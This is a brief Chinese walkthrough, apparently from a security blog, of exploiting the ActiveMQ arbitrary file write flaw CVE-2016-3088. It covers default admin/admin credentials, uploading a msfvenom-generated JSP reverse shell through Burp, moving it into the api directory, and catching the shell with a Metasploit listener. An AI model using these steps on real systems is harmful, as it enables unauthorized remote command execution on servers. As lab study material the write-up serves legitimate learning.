ActiveMQ 任意文件写入漏洞(CVE-2016-3088)
Created at 2019-07-01 Updated at 2019-08-15 Category 漏洞渗透
ActiveMQ 任意文件写入漏洞(CVE-2016-3088)
写 shell 的话,需要写在 admin 或者 api 中,也就是需要登录,没有密码的话完成不了写 shell 操作。
该环境默认的口令为 admin/admin。
访问 http://127.0.0.1:8161/admin/test/systemProperties.jsp
2.上传 jsp 小马,返回204,但是在 fileserver 路径下不解析
本人用msf生成的
msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.199.117 lport=9999 R >shell.jsp
访问这个网址,用burp拦截
把生成的木马内容放到拦截的内容下,上传成功会显示204(如图)
然后访问如图IP,看成功没
然后移动到 api 目录下,成功的话,返回 204 No Content
然后访问看有没有成功,然后点击,kali进行监听
添加监听模块和payload
添加端口和自己IP
开始监听,可以输入命令就成功了